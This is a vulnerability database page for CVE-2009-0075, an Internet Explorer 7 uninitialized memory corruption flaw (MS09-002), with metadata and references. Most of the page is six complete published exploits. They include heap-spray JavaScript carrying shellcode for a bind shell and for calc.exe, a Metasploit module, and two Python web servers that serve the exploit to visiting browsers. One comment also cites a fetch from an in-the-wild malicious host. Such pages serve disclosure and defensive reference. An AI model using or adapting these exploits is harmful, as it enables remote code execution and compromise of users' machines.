CVE-2009-0075 : Detail

CVE-2009-0075

96.89%V3
Network
2009-02-10
21h13 +00:00
2018-10-12
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Microsoft Internet Explorer 7 does not properly handle errors during attempted access to deleted objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to CFunctionPointer and the appending of document objects, aka "Uninitialized Memory Corruption Vulnerability."

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 8077

Publication date : 2009-02-17 23h00 +00:00
Author : anonymous
EDB Verified : Yes

<!-- MS09-002 =============================== grabbed from: wget http://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html --user-agent="MSIE 7.0; Windows NT 5.1" took a little but found it. /str0ke --> <script language="JavaScript"> var c="putyourshizhere-unescaped"; var array = new Array(); var ls = 0x100000-(c.length*2+0x01020); var b = unescape("%u0C0C%u0C0C"); while(b.length<ls/2) { b+=b;} var lh = b.substring(0,ls/2); delete b; for(i=0; i<0xC0; i++) { array[i] = lh + c; } CollectGarbage(); var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA"); var a1 = new Array(); for(var x=0;x<1000;x++) a1.push(document.createElement("img")); function ok() { o1=document.createElement("tbody"); o1.click; var o2 = o1.cloneNode(); o1.clearAttributes(); o1=null; CollectGarbage(); for(var x=0;x<a1.length;x++) a1[x].src=s1; o2.click; } </script><script>window.setTimeout("ok();",800);</script> # milw0rm.com [2009-02-18]
Exploit Database EDB-ID : 8082

Publication date : 2009-02-19 23h00 +00:00
Author : webDEViL
EDB Verified : Yes

<!-- Calculator should spawn. changed the block size. tested on 2003 Server SP2. webDEViL --> <script language="JavaScript"> var c=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100"); var array = new Array(); var ls = 0xd00000; var b = unescape("%u0c0c%u0c0c"); while(b.length<ls/2) { b+=b;} var lh = b.substring(0,ls/2); delete b; for(i=0; i<0xC0; i++) { array[i] = lh + c; } CollectGarbage(); var s1=unescape("%u9090%u9090AAAAAAAAAAAAAAAAAAAAAAAAAA"); var a1 = new Array(); for(var x=0;x<1000;x++) a1.push(document.createElement("img")); function ok() { o1=document.createElement("tbody"); o1.click; var o2 = o1.cloneNode(); o1.clearAttributes(); o1=null; CollectGarbage(); for(var x=0;x<a1.length;x++) a1[x].src=s1; o2.click; } </script><script>window.setTimeout("ok();",800);</script> # milw0rm.com [2009-02-20]
Exploit Database EDB-ID : 8079

Publication date : 2009-02-19 23h00 +00:00
Author : Abysssec
EDB Verified : Yes

<!-- Internet Explorer 7 Uninitialized Memory Corruption Exploit http://www.microsoft.com/technet/security/bulletin/MS09-002.mspx Abyssec Inc Public Exploits 2009/2/18 this Exploit is based on N/A PoC in Milw0rm but The PoC was really simple to exploit this PoC can be exploit on DEP-Enabled System As well using .Net Shellcode trick or etc mayve i write Dep-Enabled version too And also i should notice , this code can modify to be more reliable .. Feel free to visit us at : www.Abyssec.com to contact me directly use : admin@abyssec.com Note : Tested and Worked On XP SP2 please wait for another version --> <script language="JavaScript"> // Skyland win32 bindshell (28876/tcp) shellcode // If you want an evill Shellcode go ahead !!! var shellcode=unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb"); var array = new Array(); //Don't need change but for execute time you can change ;) var calc = 0x100000-(shellcode.length*2+0x01020); // Spray or Not :-?? var point = unescape("%u0D0D%u0D0D"); while(point.length<calc) { point+=point;} var sec = point.substring(0,calc/2); delete point; for(i=0; i<0xD0; i++) { array[i] = sec + shellcode; } // N/A Code CollectGarbage(); var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA"); var a1 = new Array(); for(var x=0;x<500;x++) a1.push(document.createElement("img")); o1=document.createElement("tbody"); o1.click; var o2 = o1.cloneNode(); o1.clearAttributes(); o1=null; CollectGarbage(); for(var x=0;x<a1.length;x++) a1[x].src=s1; o2.click; </script> # milw0rm.com [2009-02-20]
Exploit Database EDB-ID : 16555

Publication date : 2010-07-11 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: ms09_002_memory_corruption.rb 9787 2010-07-12 02:51:50Z egypt $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking # # Superceded by ms10_018_ie_behaviors, disable for BrowserAutopwn # #include Msf::Exploit::Remote::BrowserAutopwn #autopwn_info({ # :ua_name => HttpClients::IE, # :ua_minver => "7.0", # :ua_maxver => "7.0", # :javascript => true, # :os_name => OperatingSystems::WINDOWS, # :vuln_test => nil, # no way to test without just trying it #}) include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption', 'Description' => %q{ This module exploits an error related to the CFunctionPointer function when attempting to access uninitialized memory. A remote attacker could exploit this vulnerability to corrupt memory and execute arbitrary code on the system with the privileges of the victim. }, 'License' => MSF_LICENSE, 'Author' => [ 'dean [at] zerodaysolutions [dot] com' ], 'Version' => '$Revision: 9787 $', 'References' => [ [ 'CVE', '2009-0075' ], [ 'OSVDB', '51839' ], [ 'MSB', 'MS09-002' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP2-SP3 / Windows Vista SP0 / IE 7', { 'Ret' => 0x0C0C0C0C } ] ], 'DisclosureDate' => 'Feb 17 2008', 'DefaultTarget' => 0)) @javascript_encode_key = rand_text_alpha(rand(10) + 10) end def autofilter false end def check_dependencies use_zlib end def on_request_uri(cli, request) if (!request.uri.match(/\?\w+/)) send_local_redirect(cli, "?#{@javascript_encode_key}") return end # Re-generate the payload. return if ((p = regenerate_payload(cli)) == nil) # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Set the return. ret = Rex::Text.to_unescape([target.ret].pack('V')) # Randomize the javascript variable names. rand1 = rand_text_alpha(rand(100) + 1) rand2 = rand_text_alpha(rand(100) + 1) rand3 = rand_text_alpha(rand(100) + 1) rand4 = rand_text_alpha(rand(100) + 1) rand5 = rand_text_alpha(rand(100) + 1) rand6 = rand_text_alpha(rand(100) + 1) rand7 = rand_text_alpha(rand(100) + 1) rand8 = rand_text_alpha(rand(100) + 1) rand9 = rand_text_alpha(rand(100) + 1) rand10 = rand_text_alpha(rand(100) + 1) rand11 = rand_text_alpha(rand(100) + 1) rand12 = rand_text_alpha(rand(100) + 1) rand13 = rand_text_alpha(rand(100) + 1) fill = rand_text_alpha(25) js = %Q| var #{rand1} = unescape("#{shellcode}"); var #{rand2} = new Array(); var #{rand3} = 0x100000-(#{rand1}.length*2+0x01020); var #{rand4} = unescape("#{ret}"); while(#{rand4}.length<#{rand3}/2) {#{rand4}+=#{rand4};} var #{rand5} = #{rand4}.substring(0,#{rand3}/2); delete #{rand4}; for(#{rand6}=0;#{rand6}<0xC0;#{rand6}++) {#{rand2}[#{rand6}] = #{rand5} + #{rand1};} CollectGarbage(); var #{rand7} = unescape("#{ret}"+"#{fill}"); var #{rand8} = new Array(); for(var #{rand9}=0;#{rand9}<1000;#{rand9}++) #{rand8}.push(document.createElement("img")); function #{rand10}() { #{rand11} = document.createElement("tbody"); #{rand11}.click; var #{rand12} = #{rand11}.cloneNode(); #{rand11}.clearAttributes(); #{rand11}=null; CollectGarbage(); for(var #{rand13}=0;#{rand13}<#{rand8}.length;#{rand13}++) #{rand8}[#{rand13}].src=#{rand7}; #{rand12}.click; } window.setTimeout("#{rand10}();",800); | js = encrypt_js(js, @javascript_encode_key) content = %Q|<html> <script language="JavaScript"> #{js} </script> </html> | content = Rex::Text.randomize_space(content) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end end
Exploit Database EDB-ID : 8080

Publication date : 2009-02-19 23h00 +00:00
Author : David Kennedy (ReL1K)
EDB Verified : Yes

#!/usr/bin/env python ############################################################################### # MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) # ############################################################################### # # # Thanks to str0ke for finding this in the wild. # # # # Tested on Windows 2003 SP2 R2 # # # # Written by SecureState R&D Team (ReL1K) # # http://www.securestate.com # # # # win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind # # # ############################################################################### from BaseHTTPServer import HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler import sys try: import psyco psyco.full() except ImportError: pass class myRequestHandler(BaseHTTPRequestHandler): try: def do_GET(self): # Always Accept GET self.printCustomHTTPResponse(200) # Site root: Main Menu if self.path == "/": target=self.client_address[0] self.wfile.write("""<html><head>""") self.wfile.write("""<div id="replace">x</div> <script language="JavaScript"> // win32_bind - EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai http://metasploit.com */ var c = unescape("%ud9db%u74d9%uf424%uc929%u51b1%u02bf%u6c21%u588e%u7831%u8317%u04c0%u7a03%u8e32%u867b%ua55e%u9ec9%uc666%ua12d%ub2f9%u79be%u4fde%ubd7b%u2c95%uc581%u23a8%u7a02%u30b3%ua44a%uadc2%u2f3c%ubaf0%uc1be%u7cc8%ub159%ubdaf%uce2e%uf76e%ud1c2%ue3b2%uea29%ud066%u79f9%u9362%ua5a5%u4f6d%u2e3f%uc461%u6f4b%udb66%u8ca0%u50ba%ufebf%u7ae6%u3da1%u59d7%u4a45%u6e5b%u0c0d%u0550%u9061%u92c5%ua0c2%ucd4b%ufe4c%ue17d%u0101%u9f57%u9bf2%u5330%u0bc7%ue0b6%u9415%uf86c%u428a%ueb46%ua9d7%u0b08%u92f1%u1621%uad98%ud1df%uf867%ue075%ud298%u3de2%u276f%uea5f%u118f%u46f3%uce23%u2ba7%ub390%u5314%u55c6%ubef3%uff9b%u4850%u6a82%uee3e%ue45f%ub978%ud2a0%u56ed%u8f0e%u860e%u8bd8%u095c%u84f0%u8061%u7f51%ufd61%u9a3e%u78d4%u33f7%u5218%uef58%u0eb2%udfa6%ud9a8%ua6bf%u6008%ua717%uc643%u8768%u830a%u41f2%u30bb%u0496%uddde%u4f38%uee08%u8830%uaa20%ub4cb%uf284%u923f%ub019%u1c92%u19a7%u6d7e%u5a52%uc62b%uf208%ue659%u15fc%u6361%ue547%ud04b%u4b10%ub725%u01cf%u66c4%u80a1%u7797%u4391%u5eb5%u5a17%u9f96%u08ce%ua0e6%u33d8%ud5c8%u3070%u2d6a%u371a%uffbb%u171c%u0f2c%u9c68%ubcf2%u4b92%u92f3"); var array = new Array(); var ls = 0x100000-(c.length*2+0x01020); var b = unescape("%u0C0C%u0C0C"); while(b.length<ls/2) { b+=b;} var lh = b.substring(0,ls/2); delete b; for(i=0; i<0xC0; i++) { array[i] = lh + c; } CollectGarbage(); var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA"); var a1 = new Array(); for(var x=0;x<1000;x++) a1.push(document.createElement("img")); function ok() { o1=document.createElement("tbody"); o1.click; var o2 = o1.cloneNode(); o1.clearAttributes(); o1=null; CollectGarbage(); for(var x=0;x<a1.length;x++) a1[x].src=s1; o2.click; } </script><script>window.setTimeout("ok();",800);</script>""") self.wfile.write("""<title>Microsoft Internet Explorer MS09-002 Buffer Overflow</title></head><body>""") self.wfile.write("""<left><body bgcolor="Black"><font color="White"><p>Exploit is running...</p><br>""") print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-]NetCat to IP Address: %s and port 5500 [-]" % (target)) #print ("[-] Example: open up a command shell and type 'nc %s 5500' [-]" % (target)) # Print custom HTTP Response def printCustomHTTPResponse(self, respcode): self.send_response(respcode) self.send_header("Content-type", "text/html") self.send_header("Server", "myRequestHandler") self.end_headers() # In case of exceptions, pass them except Exception: pass httpd = HTTPServer(('', 80), myRequestHandler) print (""" ############################################################################### MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) ############################################################################### # # # Thanks to Str0ke for finding this in the wild. # # # # Tested on Windows 2003 SP2 R2 # # # # Written by SecureState R&D Team # # http://www.securestate.com # # # # win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind # # # ############################################################################### """) print ("[-] Starting MS Internet Explorer 7 Memory Corruption Exploit:80 [-]") print ("[-] Have someone connect to you on port 80 [-]") print ("Type <control>-c to exit..") try: # handle the connections httpd.handle_request() # Serve HTTP server forever httpd.serve_forever() # Except Keyboard Interrupts and throw custom message except KeyboardInterrupt: print ("\n\nExiting exploit...\n\n") sys.exit() # milw0rm.com [2009-02-20]
Exploit Database EDB-ID : 8152

Publication date : 2009-03-03 23h00 +00:00
Author : Ahmed Obied
EDB Verified : Yes

# # Author : Ahmed Obied (ahmed.obied@gmail.com) # # - Based on the code found by str0ke in the wild for MS09-002 # - Tested using Internet Explorer 7.0.5730.11 on Windows XP SP2 # # Usage : python ie_ms09002.py [port] # import sys, socket from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler class RequestHandler(BaseHTTPRequestHandler): def get_payload(self): # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub # http://metasploit.com payload = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6f' payload += '\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e\x6f\x02\x3a\x4b' payload += '\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a\x3a\x51\x4f\x03\x5a\x47' payload += '\xe4\x36\x3a\x0f\x81\x33\x71\x97\xc3\x86\x71\x7a\x68\xc3\x7b\x03' payload += '\x6e\xc0\x5a\xfa\x54\x56\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68' payload += '\xe4\x0e\xfa\x85\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a' payload += '\x6b\xc1\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85' payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02\x3a\x66' payload += '\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e\x07\x7c\x69\xec' payload += '\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61\xd0\x62\x0c\x2c\xd4\x76' payload += '\x0a\x02\xb1\x0e'; return self.convert_to_utf16(payload) def get_exploit(self): exploit = ''' function spray_heap() { var payload = unescape("<PAYLOAD>"); var ret = 0x0c0c0c0c; var heap_chunk_size = 0x40000; var nopsled_size = heap_chunk_size - (payload.length * 2) var nopsled = unescape("%u0c0c%u0c0c"); while (nopsled.length < nopsled_size) nopsled += nopsled; heap_chunks = new Array(); heap_chunks_num = (ret - heap_chunk_size)/heap_chunk_size; for (var i = 0 ; i < heap_chunks_num ; i++) heap_chunks[i] = nopsled + payload; } function trigger_bug() { var obj = document.createElement("table"); obj.click; var obj_cp = obj.cloneNode(); obj.clearAttributes(); obj = null; CollectGarbage(); var img = document.createElement("img"); img.src = unescape("%u0c0c%u0c0cCCCCCCCCCCCCCCCCCCCCCC"); obj_cp.click; } if (navigator.userAgent.indexOf("MSIE 7") != -1) { spray_heap(); trigger_bug() } else window.location = "about:blank" ''' exploit = exploit.replace('<PAYLOAD>', self.get_payload()) exploit = '<html><body><script>' + exploit + '</script></body></html>' return exploit def convert_to_utf16(self, payload): # From Beta v2.0 by Berend-Jan Wever # http://www.milw0rm.com/exploits/656 enc_payload = '' for i in range(0, len(payload), 2): num = 0 for j in range(0, 2): num += (ord(payload[i+j]) & 0xff) << (j*8) enc_payload += '%%u%04x' % num return enc_payload def log_request(self, *args, **kwargs): pass def do_GET(self): print '[-] Incoming connection from %s' % self.client_address[0] self.send_response(200) self.send_header('Content-type', 'text/html') self.end_headers() print '[-] Sending exploit to %s ...' % self.client_address[0], self.wfile.write(self.get_exploit()) print 'done' def main(): if len(sys.argv) != 2: print 'Usage: %s [port]' % sys.argv[0] sys.exit(1) port = None try: port = int(sys.argv[1]) if port < 1 or port > 65535: raise ValueError except ValueError: print '[*] ERROR: invalid port number ...' sys.exit(-1) try: serv = HTTPServer(('', port), RequestHandler) ip = socket.gethostbyname(socket.gethostname()) print '[-] Web server is running at http://%s:%d/' % (ip, port) except socket.error: print '[*] ERROR: a socket error has occurred ...' sys.exit(-1) try: serv.serve_forever() except KeyboardInterrupt: print '[-] Exiting ...' if __name__ == '__main__': main() # milw0rm.com [2009-03-04]

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 7

Microsoft>>Windows_server_2003 >> Version -

Microsoft>>Windows_server_2003 >> Version -

Microsoft>>Windows_server_2003 >> Version -

    Microsoft>>Windows_server_2003 >> Version -

    Microsoft>>Windows_server_2008 >> Version *

    Microsoft>>Windows_server_2008 >> Version -

    Microsoft>>Windows_vista >> Version -

    Microsoft>>Windows_vista >> Version -

    Microsoft>>Windows_xp >> Version -

      Microsoft>>Windows_xp >> Version -

      Microsoft>>Windows_xp >> Version -

        Microsoft>>Windows_xp >> Version -

        References

        https://www.exploit-db.com/exploits/8082
        Tags : exploit, x_refsource_EXPLOIT-DB
        http://www.securityfocus.com/bid/33627
        Tags : vdb-entry, x_refsource_BID
        http://www.vupen.com/english/advisories/2009/0389
        Tags : vdb-entry, x_refsource_VUPEN
        http://osvdb.org/51839
        Tags : vdb-entry, x_refsource_OSVDB
        https://www.exploit-db.com/exploits/8079
        Tags : exploit, x_refsource_EXPLOIT-DB
        https://www.exploit-db.com/exploits/8080
        Tags : exploit, x_refsource_EXPLOIT-DB
        https://www.exploit-db.com/exploits/8077
        Tags : exploit, x_refsource_EXPLOIT-DB
        http://www.us-cert.gov/cas/techalerts/TA09-041A.html
        Tags : third-party-advisory, x_refsource_CERT